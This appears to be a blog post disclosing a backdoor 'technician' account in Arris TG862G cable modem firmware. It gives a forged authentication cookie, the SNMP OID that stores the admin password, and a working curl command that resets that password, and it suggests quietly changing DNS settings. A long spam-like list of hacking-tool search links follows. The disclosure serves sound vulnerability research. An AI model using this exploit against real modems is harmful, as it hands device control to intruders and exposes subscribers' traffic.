6.01.2023

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Continue reading


  1. Pentest Tools Linux
  2. Hack Tools For Ubuntu
  3. Hacker Tools For Ios
  4. What Is Hacking Tools
  5. How To Install Pentest Tools In Ubuntu
  6. Hacking Tools Github
  7. Hacking Tools Windows 10
  8. Pentest Tools Find Subdomains
  9. Hacker Search Tools
  10. Github Hacking Tools
  11. Hacking Tools Mac
  12. Pentest Tools
  13. Hacker Techniques Tools And Incident Handling
  14. Hacking Tools And Software
  15. Ethical Hacker Tools
  16. Pentest Tools Linux
  17. Hack Tools For Ubuntu
  18. Pentest Tools For Windows
  19. Hacking Tools Software
  20. Pentest Tools Framework
  21. Hacking Apps
  22. Hack Tools Mac
  23. Top Pentest Tools
  24. Pentest Tools Review
  25. Hacking Tools For Windows 7
  26. Hack Tools 2019
  27. Pentest Tools Nmap
  28. Hack Tools For Windows
  29. Hack Tools For Mac
  30. Hack Tools Github
  31. Pentest Box Tools Download
  32. Pentest Tools Alternative
  33. Hack Tool Apk No Root
  34. Nsa Hacker Tools
  35. Pentest Recon Tools
  36. Hack Rom Tools
  37. Hacking App
  38. Hacker Tools For Ios
  39. Hacker Techniques Tools And Incident Handling
  40. Pentest Tools For Ubuntu
  41. Usb Pentest Tools
  42. Pentest Tools For Android
  43. Best Pentesting Tools 2018
  44. Pentest Tools Find Subdomains
  45. Hacker Search Tools
  46. Hack Tools For Ubuntu
  47. Hacking Tools For Windows
  48. Hacking App
  49. Hacking Tools Github
  50. Best Hacking Tools 2020
  51. Hacker
  52. Hacking Tools 2019
  53. Computer Hacker
  54. New Hacker Tools
  55. Hacking Tools Kit
  56. Pentest Tools Website
  57. Hacking Tools Windows 10
  58. Hack Website Online Tool
  59. Android Hack Tools Github
  60. Hacker Search Tools
  61. Hacker Tools Online
  62. Install Pentest Tools Ubuntu
  63. Hacker Tools Windows
  64. Hacking Tools 2020
  65. Hack Tools For Pc
  66. Hacker Techniques Tools And Incident Handling
  67. New Hack Tools
  68. Hacking Tools Windows 10
  69. Hack And Tools
  70. Growth Hacker Tools
  71. Pentest Tools For Ubuntu
  72. Hak5 Tools
  73. Hack Tools For Pc
  74. Hack Tools Github
  75. Pentest Tools Free
  76. Pentest Reporting Tools
  77. Pentest Tools Website
  78. Hacker Tools For Ios
  79. Hack Apps
  80. Hack Tools Download
  81. Pentest Tools Framework
  82. Hacker Tools 2020
  83. How To Install Pentest Tools In Ubuntu
  84. Hacking Tools Windows
  85. Hacking Tools Windows
  86. Hack And Tools
  87. Pentest Tools Windows
  88. Hack Apps
  89. Pentest Automation Tools
  90. Hacking Tools For Windows 7
  91. Pentest Tools Find Subdomains
  92. Hack Tools Online
  93. Hacking Tools Hardware
  94. Growth Hacker Tools
  95. Pentest Tools Website
  96. Hacker Tools Free
  97. Hack Tools For Mac
  98. Pentest Reporting Tools
  99. Hacking Tools For Games
  100. Hacking Tools For Beginners
  101. Pentest Tools Nmap
  102. Hacker Tool Kit
  103. Hacker Tools Mac
  104. Pentest Tools For Android
  105. Best Hacking Tools 2019
  106. Hack Tools Online
  107. Hack And Tools
  108. Hack Tools Github
  109. Hackrf Tools
  110. Hack And Tools
  111. Hacking Tools Free Download
  112. What Are Hacking Tools
  113. Hacker Hardware Tools
  114. Hacker Tools Online
  115. Pentest Recon Tools
  116. Tools 4 Hack
  117. Hacking Tools Name
  118. Hacking Tools Kit
  119. Nsa Hack Tools
  120. Pentest Tools Find Subdomains
  121. Hacking Tools For Pc
  122. Hack App
  123. Hack Tools
  124. Pentest Tools Tcp Port Scanner
  125. Pentest Tools Review
  126. Nsa Hack Tools
  127. Hacker Hardware Tools
  128. Wifi Hacker Tools For Windows
  129. What Are Hacking Tools
  130. Best Hacking Tools 2019
  131. Pentest Tools Kali Linux
  132. Hacker Tools Github
  133. Pentest Tools Find Subdomains
  134. Pentest Tools Find Subdomains
  135. Pentest Tools Bluekeep
  136. Pentest Tools Subdomain
  137. Hack Tools Github
  138. Top Pentest Tools
  139. Pentest Tools Windows
  140. Hacking Tools For Windows Free Download
  141. Pentest Tools Subdomain
  142. Hacker Search Tools
  143. Hacking Tools Pc
  144. Hacking App
  145. Pentest Recon Tools
  146. Computer Hacker
  147. Physical Pentest Tools
  148. Nsa Hack Tools Download
  149. Hacker
  150. How To Install Pentest Tools In Ubuntu
  151. Hacker Tools 2020
  152. Hacking Tools For Games
  153. Pentest Tools Website
  154. Hacker Tools For Ios
  155. Hacker Tools Windows
  156. Nsa Hack Tools Download
  157. Pentest Box Tools Download
  158. Pentest Tools Nmap
  159. Pentest Tools Alternative
  160. Pentest Tools Github
  161. Hacking Tools For Beginners
  162. Hacking Tools Windows
  163. Nsa Hacker Tools
  164. Physical Pentest Tools
  165. Nsa Hack Tools
  166. Hack Tools Github
  167. How To Make Hacking Tools
  168. Hacking Tools For Windows 7
  169. Ethical Hacker Tools
  170. Hacking Tools For Windows Free Download
  171. Tools Used For Hacking
  172. Hacker Security Tools